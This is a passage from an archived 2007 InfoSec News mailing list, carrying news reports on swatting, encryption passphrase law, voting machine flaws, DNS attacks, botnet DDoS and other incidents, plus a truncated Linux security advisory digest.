downloaded and taken away, but we do not believe that that has been the case. And we naturally think it might be someone trying to get into our Olympic intelligence, though we have no evidence to believe that. Ill actually be more worried about when we get to Beijing next summer. Will the phones be tapped? This is not the first time that Britain teams have had such a brush with next years hosts. The sailing team the leading international force in their sport have not had equipment returned to them that was confiscated by the Chinese authorities in March. They have been renting a house in Qingdao, the sailing venue, throughout the past year and, as is their standard practice, had installed equipment to monitor weather patterns. What concerns them is not so much the value of the equipment but the value of the data to which they no longer have access. Despite requesting its return, the equipment has not been given back. To add to that, when they were in Qingdao for the preOlympic test event in August, they discovered that Chinese officials had been looking around their accommodation during daylight hours when they were out on the water competing. The team even had security staff on the door of their house, but one of the visitors happened to be the Mayor of Qingdao head of the organising committee for the sailing event who insisted that he be allowed in. Spies like us Sports have long resorted to espionage to get the upper hand on rivals. * In the Americas Cup, the keels of boats are covered in skirts to prevent other teams from noting their design. In 1983, guards chased away American divers who had tried to take a peek at the keel of Australias entry. * In 2001 it was alleged that the Lions rugby team had been spied on during their tour to Australia. Before the 2003 World Cup final, the England changing-room was swept for bugging devices. From alerts at infosecnews.org Mon Dec 17 00:14:01 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] SWAT team goes to wrong home in 911 scam Message-ID: http://www.montereyherald.com/ci_7719737 By Julia Reynolds Herald Staff Writer 12/14/2007 A Salinas family whose apartment was surrounded by more than a dozen heavily armed SWAT officers Wednesday night were victims of a high-tech, long-distance scam known as "swatting," police said. Around 9:30 p.m., a caller to county 911 operators claimed to be a 15-year-old boy living in North Salinas. He said three armed men with AK-47 assault weapons were trying to break into his apartment. As officers rushed to the 2200 block of North Main Street, the desperate caller told operators he'd hidden in a closet because the intruders entered the dwelling and were looking for him. Police Cmdr. Bob Eggers said at least 15 SWAT officers surrounded the apartments, along with several sheriff's deputies who arrived after hearing frantic dispatches on their radios. "Virtually the whole city went out there," Eggers said. "If you think about it, three men armed with AK-47s? It paralyzed us." Believing they still were in danger, police ushered the boy's mother and sister out of the apartment under armored protection. It was then, police said, they learned they'd been scammed. It turned out the 15-year-old boy in the apartment had been "chatting" on his computer with someone claiming to be a young man from Chicago. The person apparently used software or an Internet calling system to generate a phony call to Monterey County's 911 dispatchers, making them believe the call really came from the boy in Salinas. Teen had no idea Police said the Salinas youngster had no idea a SWAT team was heading toward his apartment until the boy's Internet acquaintance asked him through the computer if he "heard any sirens approaching." Coincidentally, Eggers saw a television news program a few nights earlier about swatting, a new crime in which people disguise their caller ID to elicit a SWAT response for a false emergency, often from thousands of miles away. The callers are frequently young pranksters picking random victims, but in some cases, individuals have been targeted. "I realized that this was exactly what occurred to us," Eggers said. But the night didn't end there. Less than an hour after the SWAT unit rushed to North Main Street, Eggers' phone rang. The caller said police hadn't responded to an earlier burglary report. "I asked where did the burglary occur. He gives the address we'd just been to," Eggers said. The caller identified himself as the 15-year-old boy. "I said 'That's funny, we just spoke to him.' And he hung up," he said. The swatter likely used Voice over Internet Protocol with a disguised caller ID, police said. VoIP services allow users to make calls directly from a computer, converting the voice into a digital signal that travels over the Internet that is then changed to a regular telephone signal. Even after Eggers spoke with the apparent swatter, calls reporting emergencies at the same address came in twice more that night and police say they had to keep sending out officers to be sure residents were safe. "What they're not getting is it leaves our city vulnerable and puts people in harm's way," Eggers said. "It's an extremely dangerous situation. It's beyond juvenile." In other cities, similar pranks have occurred that, like the one in Salinas, could easily have turned deadly. An Orange County victim who thought he heard prowlers outside his house charged at SWAT officers with a knife in his hand, said news reports. The officers, who carried assault rifles and were accompanied by dogs and a helicopter, handcuffed the man and his wife at gunpoint, while the couple's two toddlers slept inside. Police said they thought they were responding to a shooting with threats to shoot more victims. For that incident, 19-year-old Randal T. Ellis of Washington was charged with hacking, assault with a machine gun by proxy, false imprisonment and falsely reporting a crime. Prosecutors say he faces up to 18 years in prison. Ellis is scheduled for a preliminary hearing in Orange County next week. In a case being tried in a Texas federal court, four online chatters were charged with conspiring to swat more than 100 victims around the country. Stuart Resoff of Ohio pleaded guilty in that case and faces up to five years in prison and payments and fines of $250,000 when he is sentenced in March, U.S. attorneys said. Disguising caller ID To disguise their caller IDs known as "spoofing" swatters have either hacked into others' phone systems or have used legal services such as Spoofcard, which allows subscribers to disguise their caller ID as any number they choose. The service even electronically changes the gender of callers' voices if they choose. Now some legislators want to shut down such activities, and the U.S. Senate will soon debate S. 704, also known as the Truth in Caller ID Act of 2007. Police, meanwhile, are relying on their own computer geniuses to try to beat spoofers and swatters at their game. In the Orange County case, detectives were able to trace the crime to Ellis through computer forensics. Salinas police are hoping to do the same with their own swatter. Officers said that after the SWAT operation Wednesday, the victim voluntarily gave up his computer to police for analysis by the department's computer forensic unit. Detectives are hoping they can find the swatter's IP address buried in the hard drive's files. "Everything you do on them is traceable," Eggers said. "Hopefully our computer forensic folks are going to be able to find something valuable for us." On Wednesday, before the long night was over for emergency responders, Eggers said the swatter struck a final time. That call wasn't placed to 911 operators or police. It was to a local restaurant, ordering $127 worth of pizza that was delivered to the boy's apartment. Eggers said the family sent it back. From alerts at infosecnews.org Mon Dec 17 00:14:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Judge: Man can't be forced to divulge encryption passphrase Message-ID: http://www.news.com/8301-13578_3-9834495-38.html Posted by Declan McCullagh December 14, 2007 A federal judge in Vermont has ruled that prosecutors can't force a criminal defendant accused of having illegal images on his hard drive to divulge his PGP (Pretty Good Privacy) passphrase. U.S. Magistrate Judge Jerome Niedermeier ruled that a man charged with transporting child pornography on his laptop across the Canadian border has a Fifth Amendment right not to turn over the passphrase to prosecutors. The Fifth Amendment protects the right to avoid self-incrimination. Niedermeier tossed out a grand jury's subpoena that directed Sebastien Boucher to provide "any passwords" used with his Alienware laptop. "Compelling Boucher to enter the password forces him to produce evidence that could be used to incriminate him," the judge wrote in an order dated November 29 that went unnoticed until this week. "Producing the password, as if it were a key to a locked container, forces Boucher to produce the contents of his laptop." Especially if this ruling is appealed, U.S. v. Boucher could become a landmark case. The question of whether a criminal defendant can be legally compelled to cough up his encryption passphrase remains an unsettled one, with law review articles for the last decade arguing the merits of either approach. (A U.S. Justice Department attorney wrote an article in 1996, for instance, titled "Compelled Production of Plaintext and Keys.") This debate has been one of analogy and metaphor. Prosecutors tend to view PGP passphrases as akin to someone possessing a key to a safe filled with incriminating documents. That person can, in general, be legally compelled to hand over the key. Other examples include the U.S. Supreme Court saying that defendants can be forced to provide fingerprints, blood samples, or voice recordings. Orin Kerr, a former Justice Department prosecutor who's now a law professor at George Washington University, shares this view. Kerr acknowledges that it's a tough call, but says, "I tend to think Judge Niedermeier was wrong given the specific facts of this case." The alternate view elevates individual rights over prosecutorial convenience. It looks to other Supreme Court cases saying Americans can't be forced to give "compelled testimonial communications" and argues the Fifth Amendment must apply to encryption passphrases as well. Courts already have ruled that that such protection extends to the contents of a defendant's minds, so why shouldn't a passphrase be shielded as well? In this case, Judge Niedermeier took the second approach. He said that encryption keys can be "testimonial," and even the prosecution's alternative of asking the defendant to type in the passphrase when nobody was looking would be insufficient. Laptop files: Unencrypted, then encrypted A second reason this case is unusual is that Boucher was initially arrested when customs agents stopped him and searched his laptop when he and his father crossed the border from Canada on December 17, 2006. An officer opened the laptop, accessed the files without a password or passphrase, and allegedly discovered "thousands of images of adult pornography and animation depicting adult and child pornography." Boucher was read his Miranda rights, waived them, and allegedly told the customs agents that he may have downloaded child pornography. But then--and this is key--the laptop was shut down after Boucher was arrested. It wasn't until December 26 that a Vermont Department of Corrections officer tried to access the laptop--prosecutors obtained a subpoena on December 19--and found that the Z: drive was encrypted with PGP, or Pretty Good Privacy. (PGP sells software, including whole disk encryption and drive-specific encryption. It's a little unclear what exactly happened, but one likely scenario is that Boucher configured PGP to forget his passphrase, effectively re-encrypting the Z: drive, after a few hours or days had elapsed.) According to Niedermeier's written opinion, prosecutors sent Boucher a grand jury subpoena asking for the passwords because: Secret Service Agent Matthew Fasvlo, who has experience and training in computer forensics, testified that it is nearly impossible to access these encrypted files without knowing the password. There are no "back doors" or secret entrances to access the files. The only way to get access without the password is to use an automated system which repeatedly guesses passwords. According to the government, the process to unlock drive Z could take years, based on efforts to unlock similarly encrypted files in another case. Despite its best efforts, to date the government has been unable to learn the password to access drive Z. The opinion added: If the subpoena is requesting production of the files in drive Z, the foregone conclusion doctrine does not apply. While the government has seen some of the files on drive Z, it has not viewed all or even most of them. While the government may know of the existence and location of the files it has previously viewed, it does not know of the existence of other files on drive Z that may contain incriminating material. By compelling entry of the password the government would be compelling production of all the files on drive Z, both known and unknown. Boucher is a Canadian citizen who is a lawful permanent resident in the United States and lives with his father in Derry, N.H. Two attorneys listed as representing him could not immediately be reached for comment on Friday. So what happens next? It's possible that prosecutors will be able to establish that Boucher's laptop has child pornography on it without being able to access it: after all, there were at least two federal agents who looked at the laptop when the Z: drive was still unencrypted. But if this ruling in the case is eventually appealed, it could have a far-reaching impact in a pro-privacy or pro-law-enforcement direction. Michael Froomkin, a law professor at the University of Miami, has written that the government "would have a very hard time" trying to obtain a memorized passphrase. A similar argument, published in the University of Chicago Legal Forum in 1996, says: The courts likely will find that compelling someone to reveal the steps necessary to decrypt a PGP-encrypted document violates the Fifth Amendment privilege against compulsory self-incrimination. Because most users protect their private keys by memorizing passwords to them and not writing them down, access to encrypted documents would almost definitely require an individual to disclose the contents of his mind. This bars the state from compelling its production. This would force law enforcement officials to grant some form of immunity to the owners of these documents to gain access to them. But prosecutors think they can split the idea of immunity into two halves: divulging the passphrase, and then using the passphrase to decrypt the files. A 1996 article by Philip Reitinger of the Department of Justice's computer crime section proposes a clever device for forcing a defendant to divulge a PGP passphrase and then convicting him anyway (remember, the passphrase lets the key be used to decrypt the document): Finally, even if the foregoing considerations require the government to grant act-of-production immunity to compel production of a key, the scope of the immunity should be quite narrow. The contents of the key are not privileged, and it is the contents that will be used to decrypt a document. Therefore, the government can use the contents of the decrypted document without impediment. Unless the government cannot authenticate the document to be decrypted without using the act of production of the key, granting act-of-production immunity should have little effect. Translation: Giving a defendant limited immunity in terms of forcing them to turn over the passphrase can lead to a conviction. That's because the fellow technically isn't being convicted based on his passphrase; he's being convicted for what it unlocks. Isn't the law grand? From alerts at infosecnews.org Mon Dec 17 00:14:34 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Ohio Elections Official Calls Machines Flawed Message-ID: http://www.nytimes.com/2007/12/15/us/15ohio.html By Bob Driehaus The New York Times December 15, 2007 CINCINNATI - All five voting systems used in Ohio, a state whose electoral votes narrowly swung two elections toward President Bush, have critical flaws that could undermine the integrity of the 2008 general election, a report commissioned by the states top elections official has found. It was worse than I anticipated, the official, Secretary of State Jennifer Brunner, said of the report. I had hoped that perhaps one system would test superior to the others. At polling stations, teams working on the study were able to pick locks to access memory cards and use hand-held devices to plug false vote counts into machines. At boards of election, they were able to introduce malignant software into servers. Ms. Brunner proposed replacing all of the states voting machines, including the touch-screen ones used in more than 50 of Ohios 88 counties. She wants all counties to use optical scan machines that read and electronically record paper ballots that are filled in manually by voters. She called for legislation and financing to be in place by April so the new machines can be used in the presidential election next November. She said she could not estimate the cost of the changes. [...] From alerts at infosecnews.org Mon Dec 17 00:14:49 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] RE: DNS attack could signal Phishing 2.0 Message-ID: Forwarded from The Unknown Security Guy On Dec 13, 2007 3:05 AM, InfoSec News wrote: > Forwarded from: Crypto Admin > > On 12/11/07, InfoSec News wrote: > > http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html > > > > By Robert McMillan > > IDG News Service > > December 11, 2007 > > > > Researchers at Google and the Georgia Institute of Technology are > > studying a virtually undetectable form of attack that quietly controls > > where victims go on the Internet. > > Please read the comments on this article over at CircleID, where it is > pointed out that the data does not support any difficulties with open > recursive DNS servers, but rather with misconfigured DNS servers. Both > David A. Ulevitch and Brett Watson make the points far better than I > could. > > http://www.circleid.com/posts/malicious_open_recursive_dns_servers/ > > The authors of this report would have done themselves a favor, had > they listened to their reviewers I agree that it would make sense to point out that while DNSSEC ( http://www.dnssec.net ) will help, upgrading from Bind 4 might also help out a bit.. While I do not know if Dagon and friends scanned for port 53 (possibly including DNS servers running on infected Comcast machines for example), or used NS and SOA records to locate servers, I think the method was most likely a mix of all methods: port 53 scans, mixed with watching traffic to gather name server addresses, as well as taking advantage of the hierarchical nature of DNS mixed with professional connections. Still, it doesn't take many servers to create either DNS Poisoning or massive DDoS's via DNS amplification attacks, and 10's of thousands of "rogue" DNS servers are easily still enough to bring any TLD to its knees without the need for a massive botnet to do so (see: the death of blue security here: http://blog.washingtonpost.com/securityfix/2006/05/blue_security_surrenders_but_s.html and DNS Amplification Attacks here: http://www.securiteam.com/securityreviews/5GP0L00I0W.html ).. Even if its due to malicious installation, misconfiguration, out-of-date software, caching or recursive queries: these servers all pose a threat, and only contribute to the ability for one person to take out what seems to be the Internet's Achilles' heel: DNS. Combining these five types of "rogue" servers in an attack can lead vectors that boggle the mind. The only reason we haven't seen many of the massive DNS Amplification Attacks on Major TLD's is that the InfoSec community is largely ineffectual when it comes to hurting spammers/botmasters and cleaning up the networks and thereby damaging the attackers bottom line. (I.E.: Whack-A-Mole is better than all-out war for their portfolio (and ours), which relies on the Internet to function for either of us to make any money). If our success at taking down botnets grows, we will see more of these attacks happen in order to show that whack-a-mole appeases everyone, while all out war hurts everyone (see blue security again :-). In the meantime, while DNS Amplification Attacks are blasse' and would lead to all out war (bad for both sides), DNS Poisoning can further the game of whack-a-mole without really hurting either InfoSec or Phishers, only end users. Very likely to be a growing attack vector. I guess I am agreeing with David's assessment of the situation. From alerts at infosecnews.org Mon Dec 17 00:15:06 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Botnets linked to political hacking in Russia Message-ID: http://www.theregister.co.uk/2007/12/14/botnet_hacktivism/ By John Leyden The Register 14th December 2007 Security researcher Jose Nazario has uncovered circumstantial evidence of the use of botnets in politically-motivated denial of service attacks. Political events in the wider world are sometimes accompanied by hacking incidents in cyberspace, such as defacements and the like. Nobody paid much attention to the issue until the Estonian DDoS events of earlier this year when government and commercial sites in the small Baltic country were taken offline for days in April amid a row with Russia about relocation of a Soviet-era memorial to fallen soldiers and war graves. Botnets orchestrated by Russian hackers are reckoned to have been used to fire up the Estonian attacks. Involvement of elements from the Russian government is suspected by some, though there's nothing by way of evidence that the Kremlin had a hand in the assaults. Nazario, a senior security researcher at Arbor Networks, has documented how botnets have featured in more recent politically motivated DDoS events. Attacks on the Ukrainian pro-Russian site of the Party of Regions, a party led by the Ukrainian Prime Minister Viktor Yanukovych, over the last three months were traced by Nazario back to networks of compromised machines. Earlier DDoS attacks against the site of Ukraine President Viktor Yushchenko, a moderate Ukrainian nationalist, were not traced back to botnet activity. Last week, Nazario traced attacks on the site of Gary Kasparov, famed Russian chess grand master turned anti-establishment politician, and namarsh.ru, another dissident site, back to a botnet. Both targeted sites seem to have weathered the assault largely unscathed (though the graphics on Kasparov's site failed to load properly). The motives, much less the perpetrators, of the attacks remain unclear. "I can dream up scenarios where Russian hackers attack Russian dissident websites and politicians websites (and why, for example, a Ukrainian site that is pro-Russian is attacked), but I dont know who is at the keyboard," Nazario writes. "Ill keep watching these attacks and seeing what I can figure out, but so far its just a matter of guessing at motivations." From alerts at infosecnews.org Mon Dec 17 00:15:42 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Computer hackers hit into UM-Flint system Message-ID: http://www.mlive.com/news/flintjournal/index.ssf?/base/news-47/119769647063950.xml&coll=5 By Bryn Mickle The Flint Journal First Edition December 15, 2007 FLINT - Computer users on the campus of the University of Michigan-Flint have been told to consider changing their passwords after hackers broke into several servers recently. University computer technicians from the Flint and Ann Arbor campuses are working with the Flint office of the FBI to determine who was responsible for the unauthorized access. The hack was discovered Dec. 6 and university officials said it is still unknown what data might have been compromised. The breach was contained shortly after it was found, said university spokesperson Jen Hogan. Staff, students and faculty were told about the situation via an e-mail from the university on Thursday. Hogan said periodic password changes had already been suggested before the hack was discovered. "It's always a good idea," said Hogan. It was unknown how many computers had access to the servers and no further information has been released. From alerts at infosecnews.org Mon Dec 17 00:16:06 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Admin Faces Prison for Trying to Axe California Power Grid Message-ID: http://www.pcworld.com/article/id,140587-c,hackers/article.html By Robert McMillan IDG News Service December 14, 2007 A California man pleaded guilty Friday to charges that he shut down the data center responsible for managing the state's electrical supply. Lonnie Denison, 33, is now facing as much as five years in prison and a US$250,000 fine after admitting to breaking a glass cover and hitting the emergency "off" switch at the California Independent System Operator (Cal-ISO) data center in Folsom, California, on April 15. By doing so, he shut off the power in the data center. He was formerly a contract Unix system administrator at the center. Cal-ISO is the nonprofit organization that manages California's power. By knocking these systems offline, Denison effectively cut the state off from the energy market, leaving California vulnerable to blackout conditions. No blackouts occurred, however, because the data center went down at 11:23 p.m. on a Sunday -- a time when electricity demand is typically at a lull. "If this deliberate shut-off had occurred in the morning ... things would have been far more severe," wrote Matthew Amant, the California Highway Patrol officer assigned to investigate the incident, in an affidavit. It's not clear why Denison would have wanted to flip the switch on California's power, but according to U.S. attorneys, he was in a dispute with co-workers and just minutes before the incident had discovered that his computer privileges had been revoked. Prosecutors allege that he followed up the power outage by sending an e-mail bomb threat the next day to an unnamed Cal-ISO employee, saying, "Hey, at one point I respected you ... you have a new kid. So this is only because of him. Get out before the timer expires. Not long now. Take care." Following this threat, Cal-ISO evacuated about 500 employees from all three of its Folsom campus buildings, transferring control of the grid to a second control center. That same day Denison spoke with a friend, admitting that he had tried to "shut off the power grid," according to a statement from the U.S. Department of Justice. The Sunday night incident knocked the data center down for about two hours, but it took 20 computer technicians about seven hours to fully restore the system. The total cost of the outage is estimated at $14,000. Denison, of Sacramento, California, is set to be sentenced on Feb. 29, 2008, in federal court. From alerts at infosecnews.org Tue Dec 18 00:00:55 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Researchers: Beware the IE Cache on a Public Terminal Message-ID: http://www.eweek.com/article2/0,1895,2236192,00.asp By Ryan Naraine eWEEK.com December 17, 2007 If you use IE to access Gmail on public terminals, you may be leaving a lot of sensitive information exposed in the browser's cache. If you use Internet Explorer to access Google's Gmail on public terminals, you may be leaving a lot of sensitive information exposed in the browser's cache, according to a warning from Web application security specialist Cenzic. Cenzic issued an alert for what it argues are vulnerabilities in Gmail and IE that could "severely impact e-mail systems and user privacy." However, Microsoft has downplayed the risk, insisting this is "not a product vulnerability." Cenzic spokesman Mandeep Khera said his company's researchers figured out a way to use CSRF (cross-site request forgery) in combination with the improper use of caching directives to hijack Gmail credentials from the IE cache. The issue is specific to Gmail on IE and Cenzic believes both Microsoft and Google should apply fixes to secure customers, especially those using computer kiosks in a library or Internet caf. After a "thorough investigation," Microsoft has dismissed the threat as overblown. "In the scenario in question an attacker would need authenticated access to the system in order to modify files located in the cache. With that level of access, an attacker could install malicious programs that would have more impact than the scenarios described," a Microsoft spokesman said in a statement sent to eWEEK. Cenzic's Khera acknowledged that the hacker must have physical access to the system to launch an attack but insists it presents a real cross-site scripting risk to end users who use public terminals. "I understand Microsoft's position but that doesn't mean it's not a vulnerability. It's still a serious issue that needs to be patched," Khera said in an interview. In the absence of a patch, Khera recommends that users disable caching of pages at the browser level, which will prevent any page from being cached for later viewing. This workaround may adversely affect the browsing experience, he warned. Technical details of the issue has been sent to the US-CERT (U.S. Computer Emergency Response Team). From alerts at infosecnews.org Tue Dec 18 00:01:36 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] RE: DNS attack could signal Phishing 2.0 Message-ID: Forwarded from: Paul Hoffman At 12:14 AM -0600 12/17/07, InfoSec News wrote: > > Please read the comments on this article over at CircleID, where it > > is pointed out that the data does not support any difficulties with > > open recursive DNS servers, but rather with misconfigured DNS > > servers. Both David A. Ulevitch and Brett Watson make the points far > > better than I could. > > > > http://www.circleid.com/posts/malicious_open_recursive_dns_servers/ > > > > The authors of this report would have done themselves a favor, had > > they listened to their reviewers > > I agree that it would make sense to point out that while DNSSEC ( > http://www.dnssec.net ) will help, upgrading from Bind 4 might also > help out a bit.. DNSSEC will not help unless the users' systems are configured to reject unsigned responses and responses whose signature will not validate. It will take typical users about ten minutes to apply the "just click through the security warnings" lesson from SSL to these warnings, thereby making DNSSEC useless to everyone except the people who are already security conscious. No panacea here. > Still, it doesn't take many servers to create either DNS Poisoning or > massive DDoS's via DNS amplification attacks You have conflated two completely different DNS problems into one, thereby falling for Mice and Men's scare tactics. To fix DNS poisoning attacks, we need to get the resolvers running the broken code to update their code. *None* of the people running those resolvers want to be running bad code; it doesn't serve them at all. They can be identified and, with a bit of creativity, contacted by email and phone. A round of "shaming the lame" could probalby reduce the number of such servers by 90%. In order to reduce the possibility of DNS amplification attacks, you need to turn off nearly every open DNS resolver. This is essentially impossible because there are plenty of good reasons for DNS administrators to want their resolvers to be open. Closing open resolvers means that mobile users cannot use their home DNS servers and are at the whim of whatever local DNS server they are forced to attach to. This can and will change over time as PCs allow users to easily use passwords to get their DNS resolution services, but for now (and probably at least ten years), they're stuck. As the original message said, read the comments on the original article from people who have actually researched this topic. Knee-jerk reactions are common (as we have seen in the debate on this topic in the IETF for the past few months) but not helpful in actually getting the DNS to be secure in the long run. --Paul Hoffman, Director --VPN Consortium From alerts at infosecnews.org Tue Dec 18 00:02:02 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Linux Advisory Watch: December 14th, 2007 Message-ID: +------------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 14th, 2007 Volume 8, Number 51 | | | | Editorial Team: Dave Wreski | | Benjamin D. Thomas | +------------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, advisories were released for ruby, libnss, htdig, samba, qt, firefox, wpa_supplicant, openssh-askpass, mysql, e2fsprogs, tomcat, java, autofs, python, and cairo. The distributors include Debian, Fedora, Mandriva, Red Hat, SuSE, and Ubuntu. --- >> Linux+DVD Magazine << Our magazine is read by professional network and database administrators, system programmers, webmasters and all those who believe in the power of Open Source software. The majority of our readers is between 15 and 40 years old. They are interested in current news from the Linux world, upcoming projects etc. In each issue you can find information concerning typical use of Linux: safety, databases, multimedia, scientific tools, entertainment, programming, e-mail, news and desktop environments. http://www.linuxsecurity.com/ads/adclick.php?bannerid=26 --- Knock, Knock, Knockin' on EnGarde's Door (with FWKNOP) ------------------------------------------------------ Secret knocks have been used for purposes as simple and childish as identifying friend or foe during a schoolyard fort war. Fraternities teach these knocks as a rite of passage into their society, and in our security world we can implement this layer of security to lock down an SSH server. With this guide on FWKNOP by Eckie S. (one of our own), you are taken on an easy-to-follow process of securing your platform with your own client and server port knocking set-up. Installation, iptable Rules setup, configuring access for the client and server, and everything in between. Check it out! http://www.linuxsecurity.com/content/view/131846 --- Master's Student: Social Engineering is not just a definition! -------------------------------------------------------------- We are happy to announce a new addition to the Linux Security Contributing Team: Gian G. Spicuzza. Currently a Graduate Student pursuing a Masters Degree in Computer Security (MSIA), Gian is a certified Linux/Unix administrator, the lead developer for the OSCAR-Backup System (at Sourceforge.com) and has experience in a variety of CSO, Management and consulting positions. His first topic is a quick foray into the world and psychology of Social Engineering: All the security in the world isn't going to stop one of your employees or coworkers from giving up information. Just how easy is it? http://www.linuxsecurity.com/content/view/131036 --> Take advantage of the LinuxSecurity.com Quick Reference Card! <-- --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf <-- -------------------------------------------------------------------------- * EnGarde Secure Community v3.0.18 Now Available! (Dec 4) ------------------------------------------------------- Guardian Digital is happy to announce the release of EnGarde Secure Community 3.0.18 (Version 3.0, Release 18). This release includes the brand new Health Center, new packages for FWKNP and PSAD, updated packages and bug fixes, some feature enhancements to Guardian Digital WebTool and the SELinux policy, as well as other new features. In distribution since 2001, EnGarde Secure Community was one of the very first security platforms developed entirely from open source, and has been engineered from the ground-up to provide users and organizations with complete, secure Web functionality, DNS, database and e-mail security, integrated intrusion detection and SELinux policies and more. http://www.linuxsecurity.com/content/view/131851 -------------------------------------------------------------------------- * Debian: New Linux 2.6.18 packages fix several vulnerabilities (Dec 11) ---------------------------------------------------------------------- Eric Sandeen provided a backport of Tejun Heo's fix for a local denial of service vulnerability in sysfs. Under memory pressure, a dentry structure maybe reclaimed resulting in a bad pointer dereference causing an oops during a readdir. http://www.linuxsecurity.com/content/view/132136 * Debian: New ruby-gnome2 packages fix execution of arbitrary code (Dec 11) ------------------------------------------------------------------------- It was discovered that ruby-gnome2, GNOME-related bindings for the Ruby language, didn't properly sanitize input prior to constructing dialogs. This could allow for the execution of arbitary code if untrusted input is displayed within a dialog. http://www.linuxsecurity.com/content/view/132133 * Debian: New libnss-ldap packages fix denial of service (Dec 11) --------------------------------------------------------------- It was reported that a race condition exists in libnss-ldap, an NSS module for using LDAP as a naming service, which could cause denial of service attacks when applications use pthreads. http://www.linuxsecurity.com/content/view/132132 * Debian: New htdig packages fix cross site scripting (Dec 11) ------------------------------------------------------------ Michael Skibbe discovered that htdig, a WWW search system for an intranet or small internet, did not adequately quote values submitted to the search script, allowing remote attackers to inject arbitrary script or HTML into specially crafted links. http://www.linuxsecurity.com/content/view/132131 * Debian: New Linux 2.6.18 packages fix several vulnerabilities (Dec 11) ---------------------------------------------------------------------- and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. Eric Sandeen provided a backport of Tejun Heo's fix for a local denial of service vulnerability in sysfs. Under memory pressure, a dentry structure maybe reclaimed resulting in a bad pointer dereference causing an oops during a readdir. http://www.linuxsecurity.com/content/view/132128 * Debian: New samba packages fix arbitrary code execution (Dec 10) ---------------------------------------------------------------- Alin Rad Pop discovered that Samba, a LanManager-like file and printer server for Unix, is vulnerable to a buffer overflow in the nmbd code which handles GETDC mailslot requests, which might lead to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/132047 -------------------------------------------------------------------------- * Fedora 7 Update: qt4-theme-quarticurve (Dec 13) ----------------------------------------------- This update fixes Quarticurve to use system icons (rather than builtin Qt ones) in Qt 4 dialogs (e.g. QPrintDialog) also in KDE 4 apps. http://www.linuxsecurity.com/content/view/132203 -------------------------------------------------------------------------- * Mandriva: Updated Firefox packages fix multiple (Dec 14) -------------------------------------------------------- A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.11. This update provides the latest Firefox to correct these issues. As well, it provides Firefox 2.0.0.11 for older products. http://www.linuxsecurity.com/content/view/132236 * Mandriva: Updated wpa_supplicant package fixes remote (Dec 13) -------------------------------------------------------------- Stack-based buffer overflow in driver_wext.c in wpa_supplicant 0.6.0 allows remote attackers to cause a denial of service (crash) via crafted TSF data. Updated package fixes this issue. http://www.linuxsecurity.com/content/view/132201 * Mandriva: Updated samba packages fix vulnerability (Dec 11) ----------------------------------------------------------- Alin Rad Pop of Secunia Research discovered a stack buffer overflow in how Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or possibly execute arbitrary code with the permissions of the Samba server. The updated packages have been patched to correct these issues. http://www.linuxsecurity.com/content/view/132135 * Mandriva: Updated openssh-askpass-qt package fixes exit (Dec 11) ---------------------------------------------------------------- The QT openssh password asking dialog, provided by openssh-askpass-qt package, would always exit with successful status (0), even when the user did not press the Ok button. This would, at least, make the openssh client always allow sharing a connection when ControlMaster option was set to ask. This update fixes the issue. http://www.linuxsecurity.com/content/view/132134 * Mandriva: Updated MySQL packages fix multiple (Dec 10) ------------------------------------------------------ A vulnerability in MySQL prior to 5.0.45 did not require priveliges such as SELECT for the source table in a CREATE TABLE LIKE statement, allowing remote authenticated users to obtain sensitive information such as the table structure (CVE-2007-3781). http://www.linuxsecurity.com/content/view/132127 * Mandriva: Updated e2fsprogs packages fix vulnerability (Dec 10) --------------------------------------------------------------- Rafal Wojtczuk of McAfee AVERT Research found that e2fsprogs contained multiple integer overflows in memory allocations, based on sizes taken directly from filesystem information. These flaws could result in heap-based overflows potentially allowing for the execution of arbitrary code. http://www.linuxsecurity.com/content/view/132126 * Mandriva: Updated tomcat5 packages fix multiple (Dec 10) -------------------------------------------------------- A number of vulnerabilities were found in Tomcat: A directory traversal vulnerability, when using certain proxy modules, allows a remote attacker to read arbitrary files via a .. (dot dot) sequence with various slash, backslash, or url-encoded backslash characters (CVE-2007-0450; affects Mandriva Linux 2007.1 only). Multiple cross-site scripting vulnerabilities in certain JSP files allow remote attackers to inject arbitrary web script or HTML (CVE-2007-2449). http://www.linuxsecurity.com/content/view/132048 -------------------------------------------------------------------------- * RedHat: Moderate: java-1.4.2-bea security update (Dec 12) --------------------------------------------------------- A buffer overflow in the Java Runtime Environment image handling code was found. If an attacker is able to cause a server application to process a specially crafted image file, it may be possible to execute arbitrary code as the user running the Java Virtual Machine. http://www.linuxsecurity.com/content/view/132138 * RedHat: Important: autofs security update (Dec 12) -------------------------------------------------- Updated autofs packages are now available to fix a security flaw for Red Hat Enterprise Linux 5. There was a security issue with the default installed configuration of autofs version 5 whereby the entry for the "hosts" map did not specify the "nosuid" mount option. A local user with control of a remote nfs server could create a setuid root executable within an exported filesystem on the remote nfs server that, if mounted using the default hosts map, would allow the user to gain root privileges. http://www.linuxsecurity.com/content/view/132139 * RedHat: Important: autofs5 security update (Dec 12) 